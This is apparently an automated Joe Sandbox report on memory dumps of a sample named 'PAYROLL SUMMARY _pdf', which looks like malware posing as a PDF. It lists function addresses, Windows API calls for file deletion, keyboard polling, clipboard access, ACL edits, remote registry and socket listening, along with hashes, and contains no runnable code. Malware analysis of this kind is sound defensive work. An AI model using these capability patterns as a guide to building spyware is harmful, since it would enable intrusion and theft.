Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 2ebf994cd9005e011f0cab5f9373bcc39ac70b22ea30f43da7f2fe9942b42eba
Instruction ID: 6e51b271afec77b3ad22a13f73b5e692834062a7d7eafb51f50fd5e88210ccc7
Opcode Fuzzy Hash: 2ebf994cd9005e011f0cab5f9373bcc39ac70b22ea30f43da7f2fe9942b42eba
Instruction Fuzzy Hash: F5025B752246119FCB14EF24C895A2AB7E5EF88714F04885DF88A9B762CB30ED64CF85

Function 002BF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 002BF37E
_wcscmp.LIBCMT ref: 002BF393
_wcscmp.LIBCMT ref: 002BF3AA

Part of subcall function 002B45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002B45DC

FindNextFileW.KERNEL32(00000000,?), ref: 002BF3D9
FindClose.KERNEL32(00000000), ref: 002BF3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 002BF400
_wcscmp.LIBCMT ref: 002BF427
_wcscmp.LIBCMT ref: 002BF43E
SetCurrentDirectoryW.KERNEL32(?), ref: 002BF450
SetCurrentDirectoryW.KERNEL32(0030A5A0), ref: 002BF46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 002BF478
FindClose.KERNEL32(00000000), ref: 002BF485
FindClose.KERNEL32(00000000), ref: 002BF497

Strings

*.*, xrefs: 002BF3FB

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: c94724e791c7e0e76ecb456b601d85c7f369da101e5532c851c5713fe82ac303
Instruction ID: 0f2ca40455aa648fce58ded33f6cb99bb3d22c27b39314132c4c16295b22958c
Opcode Fuzzy Hash: c94724e791c7e0e76ecb456b601d85c7f369da101e5532c851c5713fe82ac303
Instruction Fuzzy Hash: 6F31183251125A6FCB50DF64ED88AEE77BC9F093A0F1042B6E944E30E0E770DE64CA64

Function 00266843 Relevance: 22.1, Strings: 17, Instructions: 883COMMON

Download Yara Rule

Strings

UTF16), xrefs: 002A1508
Oa&, xrefs: 002A1888, 002A192F, 002A19DD
UTF), xrefs: 002A1533
BSR_ANYCRLF), xrefs: 002A1757
CRLF), xrefs: 002A16FA
UCP), xrefs: 002A1546
NO_AUTO_POSSESS), xrefs: 002A1567
NO_START_OPT), xrefs: 002A1588
LIMIT_MATCH=, xrefs: 002A15A9
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr, xrefs: 002A170E, 002A17E1
CR), xrefs: 002A16C0
ANYCRLF), xrefs: 002A1734
LIMIT_RECURSION=, xrefs: 002A1635
BSR_UNICODE), xrefs: 002A1771
PJ/, xrefs: 002668B3
ANY), xrefs: 002A1717
LF), xrefs: 002A16DD

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa&$PJ/$UCP)$UTF)$UTF16)$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
API String ID: 0-3443878948
Opcode ID: 178b538b4af80d8a7ae5f0323b94486dd8e25e0c4010c17c5e4448771c6efc76
Instruction ID: 3a2208e93db283506052b7c83ca2057e00c2e82c063cebbbf8f875043f35c5f8
Opcode Fuzzy Hash: 178b538b4af80d8a7ae5f0323b94486dd8e25e0c4010c17c5e4448771c6efc76
Instruction Fuzzy Hash: 17728275E2021ADBDF14CF58C8847AEB7B5FF49720F14816AE845EB280DB709DA1CB90

Function 002A81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A8766
Part of subcall function 002A874A: GetLastError.KERNEL32(?,002A822A,?,?,?), ref: 002A8770
Part of subcall function 002A874A: GetProcessHeap.KERNEL32(00000008,?,?,002A822A,?,?,?), ref: 002A877F
Part of subcall function 002A874A: HeapAlloc.KERNEL32(00000000,?,002A822A,?,?,?), ref: 002A8786
Part of subcall function 002A874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A879D

Part of subcall function 002A87E7: GetProcessHeap.KERNEL32(00000008,002A8240,00000000,00000000,?,002A8240,?), ref: 002A87F3
Part of subcall function 002A87E7: HeapAlloc.KERNEL32(00000000,?,002A8240,?), ref: 002A87FA
Part of subcall function 002A87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002A8240,?), ref: 002A880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002A825B
_memset.LIBCMT ref: 002A8270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002A828F
GetLengthSid.ADVAPI32(?), ref: 002A82A0
GetAce.ADVAPI32(?,00000000,?), ref: 002A82DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002A82F9
GetLengthSid.ADVAPI32(?), ref: 002A8316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002A8325
HeapAlloc.KERNEL32(00000000), ref: 002A832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 002A834D
CopySid.ADVAPI32(00000000), ref: 002A8354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002A8385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002A83AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 002A83BF

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: f181dbe1741f478031f879d9bc1bfa52ebf475ac1f2599b2c94e0f32bcd82bfa
Instruction ID: aedbd344ee4976cdec722c63469109ce5960afdb5f5552b4f9962f2f923d3d63
Opcode Fuzzy Hash: f181dbe1741f478031f879d9bc1bfa52ebf475ac1f2599b2c94e0f32bcd82bfa
Instruction Fuzzy Hash: 48615B7191020AEBDF00DFA5DD48AAEBBB9FF05700F14816AE916A7291DF319A15CF60

Function 002D0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D0038,?,?), ref: 002D10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D0737

Part of subcall function 00259997: __itow.LIBCMT ref: 002599C2
Part of subcall function 00259997: __swprintf.LIBCMT ref: 00259A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002D07D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002D086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002D0AAD
RegCloseKey.ADVAPI32(00000000), ref: 002D0ABA

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 3c2219c36c9e107c6f7f7a00d8a0087f38fea50c9a1eaaace3e2f580344b5935
Instruction ID: 39ab3dae8a8754e50ab850d2f31afd28ea954eb0c242366079fc99f78a49f32e
Opcode Fuzzy Hash: 3c2219c36c9e107c6f7f7a00d8a0087f38fea50c9a1eaaace3e2f580344b5935
Instruction Fuzzy Hash: 85E15B31614211AFCB14DF24D994E6ABBE4EF89714F04846EF84ADB3A2DA30ED54CF51

Function 002B0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 002B0241
GetAsyncKeyState.USER32(000000A0), ref: 002B02C2
GetKeyState.USER32(000000A0), ref: 002B02DD
GetAsyncKeyState.USER32(000000A1), ref: 002B02F7
GetKeyState.USER32(000000A1), ref: 002B030C
GetAsyncKeyState.USER32(00000011), ref: 002B0324
GetKeyState.USER32(00000011), ref: 002B0336
GetAsyncKeyState.USER32(00000012), ref: 002B034E
GetKeyState.USER32(00000012), ref: 002B0360
GetAsyncKeyState.USER32(0000005B), ref: 002B0378
GetKeyState.USER32(0000005B), ref: 002B038A

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 4457c185a992f815fea27225879726b37316c9ff487bf2578cd8c445998ed2e2
Instruction ID: 70931a6f86f7e7a16b1cbc158f5eced5ac47850b7ac75238b3fe1ba312fb41ca
Opcode Fuzzy Hash: 4457c185a992f815fea27225879726b37316c9ff487bf2578cd8c445998ed2e2
Instruction Fuzzy Hash: 7141A7249247CB6EFF724E64948C3EBBAE0AF11380F4840DED9C6461C2DB945DE88792

Function 00264140 Relevance: 15.1, APIs: 1, Strings: 7, Instructions: 1132COMMON

Download Yara Rule

Strings

rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr, xrefs: 00297A61
Oa&, xrefs: 00264984, 00298173
VUUU, xrefs: 00297B0C
VUUU, xrefs: 00264520
VUUU, xrefs: 002644DB
ERCP, xrefs: 0026421F
VUUU, xrefs: 002644ED

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID: ERCP$Oa&$VUUU$VUUU$VUUU$VUUU$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
API String ID: 0-859897010
Opcode ID: 0a6b1026b563255bb039267ba81325e0b8844dc100b57de8a080c46307a648da
Instruction ID: a6af00a88ca4fa2e8e191c076716a21b64bd88ab8b46a1a0b3f5200e0e215245
Opcode Fuzzy Hash: 0a6b1026b563255bb039267ba81325e0b8844dc100b57de8a080c46307a648da
Instruction Fuzzy Hash: D9A2A170E2421ACBDF24DF58C9907ADB7B1BF55314F2481AAD89AA7280D7709EE1CF50

Function 002C4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 002C447F
EmptyClipboard.USER32 ref: 002C4485
GlobalAlloc.KERNEL32(00000002,?), ref: 002C449A
CloseClipboard.USER32 ref: 002C4539

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 7fdffa0053181a9f095d40e2ffa37452f9e74580f7470284350f9c7d444d04f6
Instruction ID: 620f1e16de52f0b9948515d54b925d4aec52ae62d2d29c2d23562bcd37cd47cb
Opcode Fuzzy Hash: 7fdffa0053181a9f095d40e2ffa37452f9e74580f7470284350f9c7d444d04f6
Instruction Fuzzy Hash: 6421D1356112119FDB10AF60ED1DF6A7BA8EF14311F14802AF807DB2A1DB70ED10CB98

Function 002B3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 002548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002548A1,?,?,002537C0,?), ref: 002548CE

Part of subcall function 002B4CD3: GetFileAttributesW.KERNEL32(?,002B3947), ref: 002B4CD4

FindFirstFileW.KERNEL32(?,?), ref: 002B3ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 002B3B87
MoveFileW.KERNEL32(?,?), ref: 002B3B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 002B3BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 002B3BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 002B3BF5

Strings

\*.*, xrefs: 002B3A8A, 002B3A93, 002B3AA8

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 6f2cc849f0a1634bdf0072ddbd858de0f94fab256c4ff02d05e1f146d837fd2c
Instruction ID: 56a76ab3e3f181f7dfeeba7175184d9ae8a635ee036ad2a3e611140080b7495e
Opcode Fuzzy Hash: 6f2cc849f0a1634bdf0072ddbd858de0f94fab256c4ff02d05e1f146d837fd2c
Instruction Fuzzy Hash: 045190318112499ACF05EBA0DE929EDB7B8AF14345F6441AAE84277191EF306F1DCFA4

Function 002BF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00257F41: _memmove.LIBCMT ref: 00257F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002BF6AB
Sleep.KERNEL32(0000000A), ref: 002BF6DB
_wcscmp.LIBCMT ref: 002BF6EF
_wcscmp.LIBCMT ref: 002BF70A
FindNextFileW.KERNEL32(?,?), ref: 002BF7A8
FindClose.KERNEL32(00000000), ref: 002BF7BE

Strings

*.*, xrefs: 002BF690

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 677e5d96e7164e3810ac92515df62d8c98f6c966a63b4b17b6d5ac2515a4b53e
Instruction ID: 9324b9f50b11caf68e2196039f51018248822a2068e6c9ca43b379212e9d3a5b
Opcode Fuzzy Hash: 677e5d96e7164e3810ac92515df62d8c98f6c966a63b4b17b6d5ac2515a4b53e
Instruction Fuzzy Hash: 7E41A27182020AAFCF51DF64CD49AEEBBB4FF05350F1445A6EC15A2191EB309E64DF90

Function 002658C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00265A05
_memmove.LIBCMT ref: 00265A55
_memmove.LIBCMT ref: 00265ABB

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: f32dbebd93d653cc475db4b4d54f615568b45381b9469cd7fa76880f92851e11
Instruction ID: 87b04e98f939807e20733a9c6e2c25efbc918f812e01c3d43a7118a69486230f
Opcode Fuzzy Hash: f32dbebd93d653cc475db4b4d54f615568b45381b9469cd7fa76880f92851e11
Instruction Fuzzy Hash: F212AB70A20A1ADFDF14CFA4D981AAEB3F5FF48300F108529E806E7251EB35AD65CB54

Function 00265680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00270FF6: std::exception::exception.LIBCMT ref: 0027102C
Part of subcall function 00270FF6: __CxxThrowException@8.LIBCMT ref: 00271041

_memmove.LIBCMT ref: 002A062F
_memmove.LIBCMT ref: 002A0744
_memmove.LIBCMT ref: 002A07EB

Strings

yZ&, xrefs: 002A0881, 002A07FF

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID: yZ&
API String ID: 1300846289-909687534
Opcode ID: 855c0ff3e31eae0711efd9ad0375351d7f42677114bab8f9eda8b236afa018a7
Instruction ID: 3ae362635fa00d53e5fb327dc0c9290e23a7e74d6286c7059ab33c04b20401e8
Opcode Fuzzy Hash: 855c0ff3e31eae0711efd9ad0375351d7f42677114bab8f9eda8b236afa018a7
Instruction Fuzzy Hash: C002AF70E20205DBDF04DF68D992AAEBBB5FF45300F148069E80ADB255EB31DA64CF95

Function 002B545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 002A8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A8D0D
Part of subcall function 002A8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A8D3A
Part of subcall function 002A8CC3: GetLastError.KERNEL32 ref: 002A8D47

ExitWindowsEx.USER32(?,00000000), ref: 002B549B

Strings

SeShutdownPrivilege, xrefs: 002B546B
@, xrefs: 002B548E
, xrefs: 002B5489

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 44d4d9f2bf2d140a1ec731f19ebdc5060a197b9a1efcbdadf1113bad64f883c8
Instruction ID: 4e720cc20419788b450fd2ac6aba69785c2766f3ed836688c8778fbe7cd3fad8
Opcode Fuzzy Hash: 44d4d9f2bf2d140a1ec731f19ebdc5060a197b9a1efcbdadf1113bad64f883c8
Instruction Fuzzy Hash: 5201FC31675B366BE7686E74EC4ABF67378EB053D3F240521FD07DA0D2DA901CA045A4

Function 00263190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

Oa&, xrefs: 00263482

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: __itow__swprintf
String ID: Oa&
API String ID: 674341424-711773428
Opcode ID: 53fc6625a7137acfa4f3213c64559cb08888c7286c9b122589a9ee0bb8f6279a
Instruction ID: 81a5ef6757ee7ac7a5ba04c46a42c2ec4b2a472f9c4cf0bb8015aee40378609e
Opcode Fuzzy Hash: 53fc6625a7137acfa4f3213c64559cb08888c7286c9b122589a9ee0bb8f6279a
Instruction Fuzzy Hash: 12228E715283019FCB24DF24C891B6FB7E4AF84704F14491DF89A97291DB71EAA8CB92

Function 002C6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002C65EF
WSAGetLastError.WSOCK32(00000000), ref: 002C65FE
bind.WSOCK32(00000000,?,00000010), ref: 002C661A
listen.WSOCK32(00000000,00000005), ref: 002C6629
WSAGetLastError.WSOCK32(00000000), ref: 002C6643
closesocket.WSOCK32(00000000,00000000), ref: 002C6657

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 0e02717c8522e0d9becb22ac998a6599a744cc6695cd065cb95889b7e1bc6fb6
Instruction ID: befc8705444eaa8326af9a6f13499fb30ed44a88d458f3314892ac186ab8929f
Opcode Fuzzy Hash: 0e02717c8522e0d9becb22ac998a6599a744cc6695cd065cb95889b7e1bc6fb6
Instruction Fuzzy Hash: 3C21CC306102009FDB00EF24D989F6EB7A9EF48321F24826AE917E72D1CB70AD549B55

Function 00251287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

DefDlgProcW.USER32(?,?,?,?,?), ref: 002519FA
GetSysColor.USER32(0000000F), ref: 00251A4E
SetBkColor.GDI32(?,00000000), ref: 00251A61

Part of subcall function 00251290: DefDlgProcW.USER32(?,00000020,?), ref: 002512D8

Memory Dump Source

